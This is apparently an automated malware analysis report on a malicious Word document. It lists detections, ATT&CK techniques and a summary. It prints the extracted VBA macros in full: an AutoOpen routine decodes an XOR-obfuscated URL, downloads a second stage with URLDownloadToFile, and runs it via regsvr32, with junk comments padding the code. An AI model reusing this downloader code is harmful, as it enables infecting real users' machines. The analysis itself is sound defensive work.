MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious OOXML document containing VBA macros. The `autoopen` subroutine executes a function `id` which appears to deobfuscate a string. This string is then passed to `frm.download`, likely to download a second-stage payload. Finally, a `WshShell` object is used to execute `mp.pdf`, which is likely the downloaded payload.
Heuristics 5
-
ClamAV: Doc.Downloader.GreenBox5-9139204-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
#If VBA7 And Win64 Then Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal C As LongPtr, ByVal BG As String, ByVal cw As String, ByVal oK As LongPtr, ByVal hy As LongPtr) As Long #Else -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() sx = id(AL) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3790 bytes |
SHA-256: 418159da755dfa7eaf94c20787b4c1727c5ace7fbf11829a7b57bf5f35a657f9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "T0"
Function id(GC)
' Rom glade fervor tine bleaching
' Tennis
' Favor robot
' Mutual append laughable
' Expand exactness eke
' Vestry apollo unravel python
AQ = Split(GC, " ")
For jH = 0 To UBound(AQ)
TX = TX & Chr(AQ(jH) Xor 1)
Next jH
id = TX
End Function
Sub autoopen()
sx = id(AL)
' Unbalanced edges wiring rochester
' Malay francis unaltered
' Shanty
' Ia sys fetus vitiated
' Median
' Amenable contributors
frm.download sx, "mp.pdf"
' Studying charger
' Direct
' Burly owned
' Solaris abase takes
' Hobbies hilarity suzerainty accomplishes
' Philanthropy emma
' Mia
' Eight larger
' Ll
' Projection antiquated antigua merry fundamental
' Preceding
' Atom handheld venereal rocket mausoleum differ
' Term manliness
' Bare tawdry pretentious fears egress
Dim jZ As New WshShell
Call jZ.exec(K5 & D1 & "32 mp.pdf")
End Sub
Attribute VB_Name = "T01"
Sub Y()
' Description episode curt
' Instantaneous salvador guard separately corn destroy
' Connective peoples
' Chamois
' Incongruity moodily pediatric
' Institute partly squall operator cocks strand
' Sid stat
' Vehicles loophole wreckage cricket
' Dispensation horizontal befriend bookseller petite
' Deduction workings
' Spiritualism andale
' Youse lease
' Gander merry biodiversity
' Continues
' Infrastructure clipped delineate
' Inclusive abasement criteria upset dawns
' Rail overhung clink
' Voted seventy-seven
' Hawaii
' Silhouette tibet credits
' Uncut nurture
' Wagner stalking cleveland
' Promotional smoker
' Thrive guts vellum
' Phaeton told allowed cannibal
' Idiom four
' Triangle temporarily florist equinoctial tonic moodily inkling
' Print scalp harpsichord submitted
' Quote candle wounding perennial
' Assess bedford pet radio
' Papua blog hittite nightmare reproduce
' Uses purchase
' Distributor
' Loss roped
' Waver freemen interactions television
' Companion scramble sumatra disability
' Feat engrave xenophon sawdust
End Sub
Attribute VB_Name = "FR"
Public Const K5 As String = "reg"
Public Const D1 As String = "svr"
Public Const AL As String = "105 117 117 113 59 46 46 56 115 120 105 108 114 106 47 98 110 108 46 53 96 101 115 46 109 110 117 119 47 113 105 113 62 109 60 123 116 102 48 47 98 96 99"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal C As LongPtr, ByVal BG As String, ByVal cw As String, ByVal oK As LongPtr, ByVal hy As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal C As Long, ByVal BG As String, ByVal cw As String, ByVal oK As Long, ByVal hy As Long) As Long
#End If
Function jI()
' Hearths
' Simulation spelling quince ryan crank terrorist pshaw situate
' Consisting label subsides baritone tuition
' Aol saline
' Translucent with
' Lens invalid
' Stud insidiously his engulf crm waxing undress
' Comprehensible minneapolis tolerance catholic
' Focus nevada
End Function
Attribute VB_Name = "frm"
Attribute VB_Base = "0{71215BEA-90A8-46AE-9C2F-005B83AC2D66}{38FDBF41-C860-4295-9D4E-74290AA4FD26}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
URLDownloadToFile 0, url, file, 0, 0
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes |
SHA-256: 38f82814c8997267489b3f2f97bb6242143cf36b6aa22d44af3e550d37656c86 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.